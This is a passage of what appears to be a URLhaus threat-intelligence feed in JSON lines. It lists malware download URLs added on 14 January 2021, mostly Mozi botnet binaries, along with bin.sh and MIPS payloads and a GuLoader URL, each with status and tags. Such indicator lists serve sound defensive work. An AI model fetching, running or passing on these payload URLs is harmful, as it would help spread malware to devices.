listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961356","urlhaus_reference":"https://urlhaus.abuse.ch/url/961356/","url":"http://42.230.54.138:34541/Mozi.m","url_status":"online","host":"42.230.54.138","date_added":"2021-01-14 20:10:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961357","urlhaus_reference":"https://urlhaus.abuse.ch/url/961357/","url":"http://219.156.51.117:51344/Mozi.a","url_status":"online","host":"219.156.51.117","date_added":"2021-01-14 20:10:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961358","urlhaus_reference":"https://urlhaus.abuse.ch/url/961358/","url":"http://42.234.186.111:40084/Mozi.m","url_status":"online","host":"42.234.186.111","date_added":"2021-01-14 20:10:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961359","urlhaus_reference":"https://urlhaus.abuse.ch/url/961359/","url":"http://58.249.73.109:60457/Mozi.m","url_status":"online","host":"58.249.73.109","date_added":"2021-01-14 20:10:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961360","urlhaus_reference":"https://urlhaus.abuse.ch/url/961360/","url":"http://27.41.5.197:34906/Mozi.a","url_status":"online","host":"27.41.5.197","date_added":"2021-01-14 20:10:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961353","urlhaus_reference":"https://urlhaus.abuse.ch/url/961353/","url":"http://176.113.161.71:59847/Mozi.m","url_status":"online","host":"176.113.161.71","date_added":"2021-01-14 20:10:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961352","urlhaus_reference":"https://urlhaus.abuse.ch/url/961352/","url":"http://122.165.112.82:47873/Mozi.m","url_status":"offline","host":"122.165.112.82","date_added":"2021-01-14 20:09:00 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961349","urlhaus_reference":"https://urlhaus.abuse.ch/url/961349/","url":"http://125.44.12.28:48645/Mozi.m","url_status":"online","host":"125.44.12.28","date_added":"2021-01-14 20:05:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961350","urlhaus_reference":"https://urlhaus.abuse.ch/url/961350/","url":"http://120.56.112.117:36524/Mozi.a","url_status":"online","host":"120.56.112.117","date_added":"2021-01-14 20:05:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961351","urlhaus_reference":"https://urlhaus.abuse.ch/url/961351/","url":"http://117.192.227.212:38726/Mozi.m","url_status":"online","host":"117.192.227.212","date_added":"2021-01-14 20:05:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961345","urlhaus_reference":"https://urlhaus.abuse.ch/url/961345/","url":"http://120.85.209.116:41149/Mozi.m","url_status":"online","host":"120.85.209.116","date_added":"2021-01-14 20:05:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961346","urlhaus_reference":"https://urlhaus.abuse.ch/url/961346/","url":"http://123.4.140.121:46993/Mozi.m","url_status":"online","host":"123.4.140.121","date_added":"2021-01-14 20:05:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961347","urlhaus_reference":"https://urlhaus.abuse.ch/url/961347/","url":"http://125.47.246.253:39190/Mozi.m","url_status":"online","host":"125.47.246.253","date_added":"2021-01-14 20:05:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961348","urlhaus_reference":"https://urlhaus.abuse.ch/url/961348/","url":"http://115.59.222.67:48344/Mozi.a","url_status":"online","host":"115.59.222.67","date_added":"2021-01-14 20:05:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961344","urlhaus_reference":"https://urlhaus.abuse.ch/url/961344/","url":"http://125.133.102.126:58427/bin.sh","url_status":"online","host":"125.133.102.126","date_added":"2021-01-14 20:04:08 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","arm","elf"]} +{"id":"961343","urlhaus_reference":"https://urlhaus.abuse.ch/url/961343/","url":"http://115.55.179.98:41921/i","url_status":"online","host":"115.55.179.98","date_added":"2021-01-14 20:02:03 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","elf","mips"]} +{"id":"961342","urlhaus_reference":"https://urlhaus.abuse.ch/url/961342/","url":"http://115.58.39.251:47140/bin.sh","url_status":"online","host":"115.58.39.251","date_added":"2021-01-14 19:55:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","elf","mips"]} +{"id":"961341","urlhaus_reference":"https://urlhaus.abuse.ch/url/961341/","url":"http://61.3.126.151:34789/Mozi.m","url_status":"online","host":"61.3.126.151","date_added":"2021-01-14 19:52:33 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961340","urlhaus_reference":"https://urlhaus.abuse.ch/url/961340/","url":"http://59.94.182.91:37634/Mozi.m","url_status":"online","host":"59.94.182.91","date_added":"2021-01-14 19:52:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961339","urlhaus_reference":"https://urlhaus.abuse.ch/url/961339/","url":"http://58.249.22.65:41636/Mozi.m","url_status":"online","host":"58.249.22.65","date_added":"2021-01-14 19:52:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961338","urlhaus_reference":"https://urlhaus.abuse.ch/url/961338/","url":"http://222.141.10.143:32907/Mozi.m","url_status":"online","host":"222.141.10.143","date_added":"2021-01-14 19:51:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961336","urlhaus_reference":"https://urlhaus.abuse.ch/url/961336/","url":"http://27.198.22.182:57568/Mozi.a","url_status":"online","host":"27.198.22.182","date_added":"2021-01-14 19:51:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961337","urlhaus_reference":"https://urlhaus.abuse.ch/url/961337/","url":"http://42.224.136.106:40740/Mozi.m","url_status":"online","host":"42.224.136.106","date_added":"2021-01-14 19:51:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961331","urlhaus_reference":"https://urlhaus.abuse.ch/url/961331/","url":"http://42.224.41.9:35927/Mozi.m","url_status":"online","host":"42.224.41.9","date_added":"2021-01-14 19:51:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961332","urlhaus_reference":"https://urlhaus.abuse.ch/url/961332/","url":"http://39.77.229.65:55558/Mozi.m","url_status":"online","host":"39.77.229.65","date_added":"2021-01-14 19:51:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961333","urlhaus_reference":"https://urlhaus.abuse.ch/url/961333/","url":"http://27.209.112.112:60558/Mozi.m","url_status":"online","host":"27.209.112.112","date_added":"2021-01-14 19:51:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961334","urlhaus_reference":"https://urlhaus.abuse.ch/url/961334/","url":"http://222.139.17.39:59624/Mozi.m","url_status":"online","host":"222.139.17.39","date_added":"2021-01-14 19:51:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961335","urlhaus_reference":"https://urlhaus.abuse.ch/url/961335/","url":"http://42.230.100.168:39386/Mozi.m","url_status":"online","host":"42.230.100.168","date_added":"2021-01-14 19:51:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961322","urlhaus_reference":"https://urlhaus.abuse.ch/url/961322/","url":"http://182.121.78.100:46289/Mozi.m","url_status":"online","host":"182.121.78.100","date_added":"2021-01-14 19:50:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961323","urlhaus_reference":"https://urlhaus.abuse.ch/url/961323/","url":"http://139.190.238.2:34951/Mozi.m","url_status":"offline","host":"139.190.238.2","date_added":"2021-01-14 19:50:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961324","urlhaus_reference":"https://urlhaus.abuse.ch/url/961324/","url":"http://186.33.122.75:47594/Mozi.m","url_status":"online","host":"186.33.122.75","date_added":"2021-01-14 19:50:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961325","urlhaus_reference":"https://urlhaus.abuse.ch/url/961325/","url":"http://182.121.32.64:55792/Mozi.m","url_status":"online","host":"182.121.32.64","date_added":"2021-01-14 19:50:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961326","urlhaus_reference":"https://urlhaus.abuse.ch/url/961326/","url":"http://123.9.207.172:35271/Mozi.m","url_status":"online","host":"123.9.207.172","date_added":"2021-01-14 19:50:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961327","urlhaus_reference":"https://urlhaus.abuse.ch/url/961327/","url":"http://186.33.122.231:36300/Mozi.m","url_status":"offline","host":"186.33.122.231","date_added":"2021-01-14 19:50:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961328","urlhaus_reference":"https://urlhaus.abuse.ch/url/961328/","url":"http://182.121.128.242:60680/Mozi.m","url_status":"online","host":"182.121.128.242","date_added":"2021-01-14 19:50:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961329","urlhaus_reference":"https://urlhaus.abuse.ch/url/961329/","url":"http://175.172.66.144:51132/Mozi.a","url_status":"online","host":"175.172.66.144","date_added":"2021-01-14 19:50:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961330","urlhaus_reference":"https://urlhaus.abuse.ch/url/961330/","url":"http://182.116.99.242:39049/Mozi.m","url_status":"online","host":"182.116.99.242","date_added":"2021-01-14 19:50:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961321","urlhaus_reference":"https://urlhaus.abuse.ch/url/961321/","url":"http://117.248.62.107:57455/Mozi.m","url_status":"online","host":"117.248.62.107","date_added":"2021-01-14 19:49:12 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961320","urlhaus_reference":"https://urlhaus.abuse.ch/url/961320/","url":"http://117.222.172.10:32823/Mozi.m","url_status":"online","host":"117.222.172.10","date_added":"2021-01-14 19:49:08 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961318","urlhaus_reference":"https://urlhaus.abuse.ch/url/961318/","url":"http://101.20.171.255:44103/Mozi.a","url_status":"online","host":"101.20.171.255","date_added":"2021-01-14 19:49:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961319","urlhaus_reference":"https://urlhaus.abuse.ch/url/961319/","url":"http://117.211.62.72:36257/Mozi.m","url_status":"offline","host":"117.211.62.72","date_added":"2021-01-14 19:49:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961317","urlhaus_reference":"https://urlhaus.abuse.ch/url/961317/","url":"http://115.55.179.98:41921/bin.sh","url_status":"online","host":"115.55.179.98","date_added":"2021-01-14 19:45:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","elf","mips"]} +{"id":"961316","urlhaus_reference":"https://urlhaus.abuse.ch/url/961316/","url":"http://182.113.226.63:50971/i","url_status":"online","host":"182.113.226.63","date_added":"2021-01-14 19:44:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","elf","mips"]} +{"id":"961315","urlhaus_reference":"https://urlhaus.abuse.ch/url/961315/","url":"http://59.96.39.120:56339/Mozi.m","url_status":"offline","host":"59.96.39.120","date_added":"2021-01-14 19:36:13 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961314","urlhaus_reference":"https://urlhaus.abuse.ch/url/961314/","url":"http://221.15.198.146:52551/Mozi.m","url_status":"online","host":"221.15.198.146","date_added":"2021-01-14 19:36:09 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961312","urlhaus_reference":"https://urlhaus.abuse.ch/url/961312/","url":"http://182.126.93.114:35942/Mozi.m","url_status":"online","host":"182.126.93.114","date_added":"2021-01-14 19:36:08 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961313","urlhaus_reference":"https://urlhaus.abuse.ch/url/961313/","url":"http://188.19.182.164:39636/Mozi.a","url_status":"online","host":"188.19.182.164","date_added":"2021-01-14 19:36:08 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961310","urlhaus_reference":"https://urlhaus.abuse.ch/url/961310/","url":"http://59.0.6.131:53548/Mozi.m","url_status":"offline","host":"59.0.6.131","date_added":"2021-01-14 19:36:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961311","urlhaus_reference":"https://urlhaus.abuse.ch/url/961311/","url":"http://45.160.145.247:40967/Mozi.m","url_status":"online","host":"45.160.145.247","date_added":"2021-01-14 19:36:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961309","urlhaus_reference":"https://urlhaus.abuse.ch/url/961309/","url":"http://186.33.104.195:49471/Mozi.m","url_status":"online","host":"186.33.104.195","date_added":"2021-01-14 19:36:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961302","urlhaus_reference":"https://urlhaus.abuse.ch/url/961302/","url":"http://42.224.172.5:43937/Mozi.m","url_status":"online","host":"42.224.172.5","date_added":"2021-01-14 19:36:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961303","urlhaus_reference":"https://urlhaus.abuse.ch/url/961303/","url":"http://182.126.89.215:57992/Mozi.a","url_status":"online","host":"182.126.89.215","date_added":"2021-01-14 19:36:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961304","urlhaus_reference":"https://urlhaus.abuse.ch/url/961304/","url":"http://27.219.111.198:43603/Mozi.m","url_status":"online","host":"27.219.111.198","date_added":"2021-01-14 19:36:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961305","urlhaus_reference":"https://urlhaus.abuse.ch/url/961305/","url":"http://27.219.76.18:37157/Mozi.a","url_status":"online","host":"27.219.76.18","date_added":"2021-01-14 19:36:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961306","urlhaus_reference":"https://urlhaus.abuse.ch/url/961306/","url":"http://185.246.178.200:37229/Mozi.m","url_status":"online","host":"185.246.178.200","date_added":"2021-01-14 19:36:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961307","urlhaus_reference":"https://urlhaus.abuse.ch/url/961307/","url":"http://222.136.88.171:49104/Mozi.m","url_status":"online","host":"222.136.88.171","date_added":"2021-01-14 19:36:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961308","urlhaus_reference":"https://urlhaus.abuse.ch/url/961308/","url":"http://61.53.193.78:49575/Mozi.m","url_status":"online","host":"61.53.193.78","date_added":"2021-01-14 19:36:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961299","urlhaus_reference":"https://urlhaus.abuse.ch/url/961299/","url":"http://112.234.38.83:50000/Mozi.a","url_status":"online","host":"112.234.38.83","date_added":"2021-01-14 19:35:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961300","urlhaus_reference":"https://urlhaus.abuse.ch/url/961300/","url":"http://115.50.226.131:36251/Mozi.m","url_status":"online","host":"115.50.226.131","date_added":"2021-01-14 19:35:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961301","urlhaus_reference":"https://urlhaus.abuse.ch/url/961301/","url":"http://116.25.134.26:51932/Mozi.m","url_status":"online","host":"116.25.134.26","date_added":"2021-01-14 19:35:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961297","urlhaus_reference":"https://urlhaus.abuse.ch/url/961297/","url":"http://116.75.197.211:45660/Mozi.m","url_status":"online","host":"116.75.197.211","date_added":"2021-01-14 19:35:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961298","urlhaus_reference":"https://urlhaus.abuse.ch/url/961298/","url":"http://112.240.79.242:42478/Mozi.m","url_status":"online","host":"112.240.79.242","date_added":"2021-01-14 19:35:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961296","urlhaus_reference":"https://urlhaus.abuse.ch/url/961296/","url":"http://103.243.184.54:50726/Mozi.m","url_status":"online","host":"103.243.184.54","date_added":"2021-01-14 19:34:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961295","urlhaus_reference":"https://urlhaus.abuse.ch/url/961295/","url":"http://59.99.93.45:40256/i","url_status":"offline","host":"59.99.93.45","date_added":"2021-01-14 19:33:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","elf","mips"]} +{"id":"961294","urlhaus_reference":"https://urlhaus.abuse.ch/url/961294/","url":"http://182.113.226.63:50971/bin.sh","url_status":"online","host":"182.113.226.63","date_added":"2021-01-14 19:29:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","elf","mips"]} +{"id":"961293","urlhaus_reference":"https://urlhaus.abuse.ch/url/961293/","url":"https://realestatederivatives.com.ng/zx/janomo_hfWUGQvSPn0.bin","url_status":"online","host":"realestatederivatives.com.ng","date_added":"2021-01-14 19:24:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"abused_legit_malware","surbl":"not listed"},"reporter":"abuse_ch","larted":"true","tags":["encrypted","GuLoader"]} +{"id":"961291","urlhaus_reference":"https://urlhaus.abuse.ch/url/961291/","url":"http://59.97.169.164:33946/Mozi.m","url_status":"offline","host":"59.97.169.164","date_added":"2021-01-14 19:22:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961292","urlhaus_reference":"https://urlhaus.abuse.ch/url/961292/","url":"http://58.249.13.69:39990/Mozi.a","url_status":"online","host":"58.249.13.69","date_added":"2021-01-14 19:22:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961288","urlhaus_reference":"https://urlhaus.abuse.ch/url/961288/","url":"http://61.52.86.202:60558/Mozi.m","url_status":"online","host":"61.52.86.202","date_added":"2021-01-14 19:22:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961289","urlhaus_reference":"https://urlhaus.abuse.ch/url/961289/","url":"http://61.52.76.45:32989/Mozi.a","url_status":"online","host":"61.52.76.45","date_added":"2021-01-14 19:22:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961290","urlhaus_reference":"https://urlhaus.abuse.ch/url/961290/","url":"http://61.52.26.66:52458/Mozi.m","url_status":"online","host":"61.52.26.66","date_added":"2021-01-14 19:22:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961286","urlhaus_reference":"https://urlhaus.abuse.ch/url/961286/","url":"http://203.212.246.231:60735/Mozi.m","url_status":"online","host":"203.212.246.231","date_added":"2021-01-14 19:21:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961287","urlhaus_reference":"https://urlhaus.abuse.ch/url/961287/","url":"http://186.33.104.197:34755/Mozi.m","url_status":"online","host":"186.33.104.197","date_added":"2021-01-14 19:21:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961285","urlhaus_reference":"https://urlhaus.abuse.ch/url/961285/","url":"http://41.86.19.146:39290/Mozi.m","url_status":"offline","host":"41.86.19.146","date_added":"2021-01-14 19:21:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961279","urlhaus_reference":"https://urlhaus.abuse.ch/url/961279/","url":"http://182.126.86.107:56141/Mozi.m","url_status":"online","host":"182.126.86.107","date_added":"2021-01-14 19:20:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961280","urlhaus_reference":"https://urlhaus.abuse.ch/url/961280/","url":"http://182.117.77.236:40247/Mozi.a","url_status":"online","host":"182.117.77.236","date_added":"2021-01-14 19:20:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961281","urlhaus_reference":"https://urlhaus.abuse.ch/url/961281/","url":"http://61.53.42.182:36619/i","url_status":"offline","host":"61.53.42.182","date_added":"2021-01-14 19:20:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","elf","mips"]} +{"id":"961282","urlhaus_reference":"https://urlhaus.abuse.ch/url/961282/","url":"http://125.41.141.246:43673/Mozi.m","url_status":"online","host":"125.41.141.246","date_added":"2021-01-14 19:20:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961283","urlhaus_reference":"https://urlhaus.abuse.ch/url/961283/","url":"http://125.42.123.186:55726/Mozi.m","url_status":"online","host":"125.42.123.186","date_added":"2021-01-14 19:20:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961284","urlhaus_reference":"https://urlhaus.abuse.ch/url/961284/","url":"http://182.119.86.244:59668/Mozi.m","url_status":"online","host":"182.119.86.244","date_added":"2021-01-14 19:20:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961278","urlhaus_reference":"https://urlhaus.abuse.ch/url/961278/","url":"http://117.194.150.198:34391/Mozi.m","url_status":"online","host":"117.194.150.198","date_added":"2021-01-14 19:19:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961277","urlhaus_reference":"https://urlhaus.abuse.ch/url/961277/","url":"http://117.242.209.61:49478/Mozi.m","url_status":"online","host":"117.242.209.61","date_added":"2021-01-14 19:19:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961276","urlhaus_reference":"https://urlhaus.abuse.ch/url/961276/","url":"http://117.247.200.34:54670/Mozi.m","url_status":"offline","host":"117.247.200.34","date_added":"2021-01-14 19:19:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} 